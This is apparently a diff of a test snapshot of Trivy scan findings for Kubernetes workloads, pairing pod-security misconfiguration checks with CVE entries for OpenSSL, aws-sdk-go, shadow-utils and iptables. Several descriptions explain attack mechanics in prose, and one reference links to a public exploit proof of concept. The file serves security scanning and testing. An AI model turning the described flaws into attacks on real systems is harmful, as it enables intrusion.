"https://nvd.nist.gov/vuln/detail/CVE-2020-13529", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV022", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "https://avd.aquasec.com/misconfig/ksv022", + ], + }, + "category": "Misconfiguration", + "description": "Adding NET_RAW or capabilities beyond the default set must be disallowed.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": "Do not set spec.containers[*].securityContext.capabilities.add and spec.initContainers[*].securityContext.capabilities.add", + "name": "Non-default capabilities added(Container 'kindnet-cni' of DaemonSet 'kindnet' should not set 'securityContext.capabilities.add')", + "references": [ { "type": "URL", - "value": "https://security.gentoo.org/glsa/202107-48", + "value": "https://avd.aquasec.com/misconfig/ksv022", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210625-0005/", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV023", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "https://avd.aquasec.com/misconfig/ksv023", + ], + }, + "category": "Misconfiguration", + "description": "HostPath volumes must be forbidden.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": "Do not set 'spec.volumes[*].hostPath'.", + "name": "hostPath volumes mounted(DaemonSet 'kindnet' should not set 'spec.template.volumes.hostPath')", + "references": [ { "type": "URL", - "value": "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", + "value": "https://avd.aquasec.com/misconfig/ksv023", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5013-1", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV030", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv030", + ], + }, + "category": "Misconfiguration", + "description": "The RuntimeDefault/Localhost seccomp profile must be required, or allow specific additional profiles.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": "Set 'spec.securityContext.seccompProfile.type', 'spec.containers[*].securityContext.seccompProfile' and 'spec.initContainers[*].securityContext.seccompProfile' to 'RuntimeDefault' or undefined.", + "name": "Default Seccomp profile not set(Either Pod or Container should set 'securityContext.seccompProfile.type' to 'RuntimeDefault')", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5013-2", + "value": "https://avd.aquasec.com/misconfig/ksv030", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-13529", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, ], "severity": "LOW", @@ -95487,586 +96422,621 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2012-2663", - "installedVersion": "1.8.7-1", - "packageName": "libxtables12", + "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV106", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "http://www.spinics.net/lists/netfilter-devel/msg21248.html", - "https://access.redhat.com/security/cve/CVE-2012-2663", - "https://bugzilla.redhat.com/show_bug.cgi?id=826702", - "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", - "https://www.cve.org/CVERecord?id=CVE-2012-2663", + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv106", ], }, - "category": "Vulnerability", - "description": "extensions/libxt_tcp.c in iptables through 1.4.21 does not match TCP SYN+FIN packets in --syn rules, which might allow remote attackers to bypass intended firewall restrictions via crafted packets. NOTE: the CVE-2012-6638 fix makes this issue less relevant.", + "category": "Misconfiguration", + "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "iptables: --syn flag bypass", + "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", + "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2012-2663", - }, - { - "type": "URL", - "value": "http://www.spinics.net/lists/netfilter-devel/msg21248.html", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2012-2663", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=826702", + "value": "https://avd.aquasec.com/misconfig/ksv106", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ConfigMap/extension-apiserver-authentication' / Class: 'config' / Type: 'kubernetes'", + "id": "AVD-KSV-0110", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://avd.aquasec.com/misconfig/avd-ksv-0110", + ], + }, + "category": "Misconfiguration", + "description": "Storing sensitive content such as usernames and email addresses in configMaps is unsafe", + "location": "scb://trivy/?Namespace=kube-system&Kind=ConfigMap&Name=extension-apiserver-authentication", + "mitigation": "Remove sensitive content from configMap data value", + "name": "ConfigMap with sensitive content(ConfigMap 'extension-apiserver-authentication' in 'kube-system' namespace stores sensitive contents in key(s) or value(s) '{"requestheader-username-headers"}')", + "references": [ { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2012-2663", + "value": "https://avd.aquasec.com/misconfig/avd-ksv-0110", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-4899", - "installedVersion": "1.4.8+dfsg-2.1", - "packageName": "libzstd1", + "fixedVersion": "3.1.1-r0", + "foundIn": "Target: 'docker.io/aquasec/trivy:0.42.0 (alpine 3.18.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2023-2650", + "installedVersion": "3.1.0-r4", + "packageName": "libcrypto3", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-4899", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4899", - "https://github.com/facebook/zstd/issues/3200", - "https://nvd.nist.gov/vuln/detail/CVE-2022-4899", - "https://www.cve.org/CVERecord?id=CVE-2022-4899", + "http://www.openwall.com/lists/oss-security/2023/05/30/1", + "https://access.redhat.com/security/cve/CVE-2023-2650", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", + "https://linux.oracle.com/cve/CVE-2023-2650.html", + "https://linux.oracle.com/errata/ELSA-2023-3722.html", + "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", + "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", + "https://ubuntu.com/security/notices/USN-6119-1", + "https://ubuntu.com/security/notices/USN-6188-1", + "https://www.cve.org/CVERecord?id=CVE-2023-2650", + "https://www.debian.org/security/2023/dsa-5417", + "https://www.openssl.org/news/secadv/20230530.txt", ], }, "category": "Vulnerability", - "description": "A vulnerability was found in zstd v1.4.10, where an attacker can supply empty string as an argument to the command line tool to cause buffer overrun.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": +"Issue summary: Processing some specially crafted ASN.1 object identifiers or +data containing them may be very slow. + +Impact summary: Applications that use OBJ_obj2txt() directly, or use any of +the OpenSSL subsystems OCSP, PKCS7/SMIME, CMS, CMP/CRMF or TS with no message +size limit may experience notable to very long delays when processing those +messages, which may lead to a Denial of Service. + +An OBJECT IDENTIFIER is composed of a series of numbers - sub-identifiers - +most of which have no size limit. OBJ_obj2txt() may be used to translate +an ASN.1 OBJECT IDENTIFIER given in DER encoding form (using the OpenSSL +type ASN1_OBJECT) to its canonical numeric text form, which are the +sub-identifiers of the OBJECT IDENTIFIER in decimal form, separated by +periods. + +When one of the sub-identifiers in the OBJECT IDENTIFIER is very large +(these are sizes that are seen as absurdly large, taking up tens or hundreds +of KiBs), the translation to a decimal number in text may take a very long +time. The time complexity is O(n^2) with 'n' being the size of the +sub-identifiers in bytes (*). + +With OpenSSL 3.0, support to fetch cryptographic algorithms using names / +identifiers in string form was introduced. This includes using OBJECT +IDENTIFIERs in canonical numeric text form as identifiers for fetching +algorithms. + +Such OBJECT IDENTIFIERs may be received through the ASN.1 structure +AlgorithmIdentifier, which is commonly used in multiple protocols to specify +what cryptographic algorithm should be used to sign or verify, encrypt or +decrypt, or digest passed data. + +Applications that call OBJ_obj2txt() directly with untrusted data are +affected, with any version of OpenSSL. If the use is for the mere purpose +of display, the severity is considered low. + +In OpenSSL 3.0 and newer, this affects the subsystems OCSP, PKCS7/SMIME, +CMS, CMP/CRMF or TS. It also impacts anything that processes X.509 +certificates, including simple things like verifying its signature. + +The impact on TLS is relatively low, because all versions of OpenSSL have a +100KiB limit on the peer's certificate chain. Additionally, this only +impacts clients, or servers that have explicitly enabled client +authentication. + +In OpenSSL 1.1.1 and 1.0.2, this only affects displaying diverse objects, +such as X.509 certificates. This is assumed to not happen in such a way +that it would cause a Denial of Service, so these versions are considered +not affected by this issue in such a way that it would be cause for concern, +and the severity is therefore considered low." +, + "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-dnnfb", "mitigation": undefined, - "name": "buffer overrun in util.c", + "name": "Possible DoS translating ASN.1 object identifiers", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-4899", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-4899", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4899", + "value": "https://avd.aquasec.com/nvd/cve-2023-2650", }, { "type": "URL", - "value": "https://github.com/facebook/zstd/issues/3200", + "value": "http://www.openwall.com/lists/oss-security/2023/05/30/1", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4899", + "value": "https://access.redhat.com/security/cve/CVE-2023-2650", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-4899", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2007-5686", - "installedVersion": "1:4.8.1-1", - "packageName": "login", - "references": [ - "http://secunia.com/advisories/27215", - "http://www.securityfocus.com/archive/1/482129/100/100/threaded", - "http://www.securityfocus.com/archive/1/482857/100/0/threaded", - "http://www.securityfocus.com/bid/26048", - "http://www.vupen.com/english/advisories/2007/3474", - "https://issues.rpath.com/browse/RPL-1825", - ], - }, - "category": "Vulnerability", - "description": "initscripts in rPath Linux 1 sets insecure permissions for the /var/log/btmp file, which allows local users to obtain sensitive information regarding authentication attempts. NOTE: because sshd detects the insecure permissions and does not log certain events, this also prevents sshd from logging failed authentication attempts by remote attackers.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "initscripts in rPath Linux 1 sets insecure permissions for the /var/lo ...", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2007-5686", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", }, { "type": "URL", - "value": "http://secunia.com/advisories/27215", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", }, { "type": "URL", - "value": "http://www.securityfocus.com/archive/1/482129/100/100/threaded", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", }, { "type": "URL", - "value": "http://www.securityfocus.com/archive/1/482857/100/0/threaded", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/26048", + "value": "https://linux.oracle.com/cve/CVE-2023-2650.html", }, { "type": "URL", - "value": "http://www.vupen.com/english/advisories/2007/3474", + "value": "https://linux.oracle.com/errata/ELSA-2023-3722.html", }, { "type": "URL", - "value": "https://issues.rpath.com/browse/RPL-1825", + "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2013-4235", - "installedVersion": "1:4.8.1-1", - "packageName": "login", - "references": [ - "https://access.redhat.com/security/cve/CVE-2013-4235", - "https://access.redhat.com/security/cve/cve-2013-4235", - "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", - "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", - "https://github.com/shadow-maint/shadow/issues/317", - "https://github.com/shadow-maint/shadow/pull/545", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", - "https://security-tracker.debian.org/tracker/CVE-2013-4235", - "https://security.gentoo.org/glsa/202210-26", - "https://ubuntu.com/security/notices/USN-5745-1", - "https://ubuntu.com/security/notices/USN-5745-2", - "https://www.cve.org/CVERecord?id=CVE-2013-4235", - ], - }, - "category": "Vulnerability", - "description": "shadow: TOCTOU (time-of-check time-of-use) race condition when copying and removing directory trees", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "shadow-utils: TOCTOU race conditions by copying and removing directory trees", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2013-4235", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2013-4235", + "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/cve-2013-4235", + "value": "https://ubuntu.com/security/notices/USN-6119-1", }, { "type": "URL", - "value": "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", + "value": "https://ubuntu.com/security/notices/USN-6188-1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-2650", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", + "value": "https://www.debian.org/security/2023/dsa-5417", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/issues/317", + "value": "https://www.openssl.org/news/secadv/20230530.txt", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "3.1.1-r0", + "foundIn": "Target: 'docker.io/aquasec/trivy:0.42.0 (alpine 3.18.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2023-2650", + "installedVersion": "3.1.0-r4", + "packageName": "libssl3", + "references": [ + "http://www.openwall.com/lists/oss-security/2023/05/30/1", + "https://access.redhat.com/security/cve/CVE-2023-2650", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", + "https://linux.oracle.com/cve/CVE-2023-2650.html", + "https://linux.oracle.com/errata/ELSA-2023-3722.html", + "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", + "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", + "https://ubuntu.com/security/notices/USN-6119-1", + "https://ubuntu.com/security/notices/USN-6188-1", + "https://www.cve.org/CVERecord?id=CVE-2023-2650", + "https://www.debian.org/security/2023/dsa-5417", + "https://www.openssl.org/news/secadv/20230530.txt", + ], + }, + "category": "Vulnerability", + "description": +"Issue summary: Processing some specially crafted ASN.1 object identifiers or +data containing them may be very slow. + +Impact summary: Applications that use OBJ_obj2txt() directly, or use any of +the OpenSSL subsystems OCSP, PKCS7/SMIME, CMS, CMP/CRMF or TS with no message +size limit may experience notable to very long delays when processing those +messages, which may lead to a Denial of Service. + +An OBJECT IDENTIFIER is composed of a series of numbers - sub-identifiers - +most of which have no size limit. OBJ_obj2txt() may be used to translate +an ASN.1 OBJECT IDENTIFIER given in DER encoding form (using the OpenSSL +type ASN1_OBJECT) to its canonical numeric text form, which are the +sub-identifiers of the OBJECT IDENTIFIER in decimal form, separated by +periods. + +When one of the sub-identifiers in the OBJECT IDENTIFIER is very large +(these are sizes that are seen as absurdly large, taking up tens or hundreds +of KiBs), the translation to a decimal number in text may take a very long +time. The time complexity is O(n^2) with 'n' being the size of the +sub-identifiers in bytes (*). + +With OpenSSL 3.0, support to fetch cryptographic algorithms using names / +identifiers in string form was introduced. This includes using OBJECT +IDENTIFIERs in canonical numeric text form as identifiers for fetching +algorithms. + +Such OBJECT IDENTIFIERs may be received through the ASN.1 structure +AlgorithmIdentifier, which is commonly used in multiple protocols to specify +what cryptographic algorithm should be used to sign or verify, encrypt or +decrypt, or digest passed data. + +Applications that call OBJ_obj2txt() directly with untrusted data are +affected, with any version of OpenSSL. If the use is for the mere purpose +of display, the severity is considered low. + +In OpenSSL 3.0 and newer, this affects the subsystems OCSP, PKCS7/SMIME, +CMS, CMP/CRMF or TS. It also impacts anything that processes X.509 +certificates, including simple things like verifying its signature. + +The impact on TLS is relatively low, because all versions of OpenSSL have a +100KiB limit on the peer's certificate chain. Additionally, this only +impacts clients, or servers that have explicitly enabled client +authentication. + +In OpenSSL 1.1.1 and 1.0.2, this only affects displaying diverse objects, +such as X.509 certificates. This is assumed to not happen in such a way +that it would cause a Denial of Service, so these versions are considered +not affected by this issue in such a way that it would be cause for concern, +and the severity is therefore considered low." +, + "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-dnnfb", + "mitigation": undefined, + "name": "Possible DoS translating ASN.1 object identifiers", + "references": [ { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/pull/545", + "value": "https://avd.aquasec.com/nvd/cve-2023-2650", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", + "value": "http://www.openwall.com/lists/oss-security/2023/05/30/1", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", + "value": "https://access.redhat.com/security/cve/CVE-2023-2650", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2013-4235", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-26", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5745-1", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5745-2", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2013-4235", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-19882", - "installedVersion": "1:4.8.1-1", - "packageName": "login", - "references": [ - "https://access.redhat.com/security/cve/CVE-2019-19882", - "https://bugs.archlinux.org/task/64836", - "https://bugs.gentoo.org/702252", - "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", - "https://github.com/shadow-maint/shadow/pull/199", - "https://github.com/void-linux/void-packages/pull/17580", - "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", - "https://security.gentoo.org/glsa/202008-09", - "https://www.cve.org/CVERecord?id=CVE-2019-19882", - ], - }, - "category": "Vulnerability", - "description": "shadow 4.8, in certain circumstances affecting at least Gentoo, Arch Linux, and Void Linux, allows local users to obtain root access because setuid programs are misconfigured. Specifically, this affects shadow 4.8 when compiled using --with-libpam but without explicitly passing --disable-account-tools-setuid, and without a PAM configuration suitable for use with setuid account management tools. This combination leads to account management tools (groupadd, groupdel, groupmod, useradd, userdel, usermod) that can easily be used by unprivileged local users to escalate privileges to root in multiple ways. This issue became much more relevant in approximately December 2019 when an unrelated bug was fixed (i.e., the chmod calls to suidusbins were fixed in the upstream Makefile which is now included in the release version 4.8).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "shadow-utils: local users can obtain root access because setuid programs are misconfigured", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-19882", + "value": "https://linux.oracle.com/cve/CVE-2023-2650.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-19882", + "value": "https://linux.oracle.com/errata/ELSA-2023-3722.html", }, { "type": "URL", - "value": "https://bugs.archlinux.org/task/64836", + "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", }, { "type": "URL", - "value": "https://bugs.gentoo.org/702252", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", + "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/pull/199", + "value": "https://ubuntu.com/security/notices/USN-6119-1", }, { "type": "URL", - "value": "https://github.com/void-linux/void-packages/pull/17580", + "value": "https://ubuntu.com/security/notices/USN-6188-1", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-2650", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202008-09", + "value": "https://www.debian.org/security/2023/dsa-5417", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-19882", + "value": "https://www.openssl.org/news/secadv/20230530.txt", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-29383", - "installedVersion": "1:4.8.1-1", - "packageName": "login", + "foundIn": "Target: 'usr/local/bin/trivy' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2020-8911", + "installedVersion": "v1.44.245", + "packageName": "github.com/aws/aws-sdk-go", "references": [ - "https://access.redhat.com/security/cve/CVE-2023-29383", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", - "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", - "https://github.com/shadow-maint/shadow/pull/687", - "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", - "https://www.cve.org/CVERecord?id=CVE-2023-29383", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", - "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", + "https://access.redhat.com/security/cve/CVE-2020-8911", + "https://aws.amazon.com/blogs/developer/updates-to-the-amazon-s3-encryption-client/?s=09", + "https://bugzilla.redhat.com/show_bug.cgi?id=1869800", + "https://github.com/advisories/GHSA-f5pg-7wfw-84q9", + "https://github.com/aws/aws-sdk-go/commit/1e84382fa1c0086362b5a4b68e068d4f8518d40e", + "https://github.com/aws/aws-sdk-go/commit/ae9b9fd92af132cfd8d879809d8611825ba135f4", + "https://github.com/aws/aws-sdk-go/pull/3403", + "https://github.com/google/security-research/security/advisories/GHSA-f5pg-7wfw-84q9", + "https://github.com/sophieschmieg/exploits/tree/master/aws_s3_crypto_poc", + "https://nvd.nist.gov/vuln/detail/CVE-2020-8911", + "https://pkg.go.dev/vuln/GO-2022-0646", + "https://www.cve.org/CVERecord?id=CVE-2020-8911", ], }, "category": "Vulnerability", - "description": "In Shadow 4.13, it is possible to inject control characters into fields provided to the SUID program chfn (change finger). Although it is not possible to exploit this directly (e.g., adding a new user fails because \\n is in the block list), it is possible to misrepresent the /etc/passwd file when viewed. Use of \\r manipulations and Unicode characters to work around blocking of the : character make it possible to give the impression that a new user has been added. In other words, an adversary may be able to convince a system administrator to take the system offline (an indirect, social-engineered denial of service) by demonstrating that "cat /etc/passwd" shows a rogue user account.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "A padding oracle vulnerability exists in the AWS S3 Crypto SDK for GoLang versions prior to V2. The SDK allows users to encrypt files with AES-CBC without computing a Message Authentication Code (MAC), which then allows an attacker who has write access to the target's S3 bucket and can observe whether or not an endpoint with access to the key can decrypt a file, they can reconstruct the plaintext with (on average) 128*length (plaintext) queries to the endpoint, by exploiting CBC's ability to manipulate the bytes of the next block and PKCS5 padding errors. It is recommended to update your SDK to V2 or later, and re-encrypt your files.", + "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-dnnfb", "mitigation": undefined, - "name": "Improper input validation in shadow-utils package utility chfn", + "name": "aws/aws-sdk-go: CBC padding oracle issue in AWS S3 Crypto SDK for golang", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-29383", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-29383", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", - }, - { - "type": "URL", - "value": "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", + "value": "https://avd.aquasec.com/nvd/cve-2020-8911", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/pull/687", + "value": "https://access.redhat.com/security/cve/CVE-2020-8911", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", + "value": "https://aws.amazon.com/blogs/developer/updates-to-the-amazon-s3-encryption-client/?s=09", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-29383", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1869800", }, { "type": "URL", - "value": "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", + "value": "https://github.com/advisories/GHSA-f5pg-7wfw-84q9", }, { "type": "URL", - "value": "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", + "value": "https://github.com/aws/aws-sdk-go/commit/1e84382fa1c0086362b5a4b68e068d4f8518d40e", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2007-5686", - "installedVersion": "1:4.8.1-1", - "packageName": "passwd", 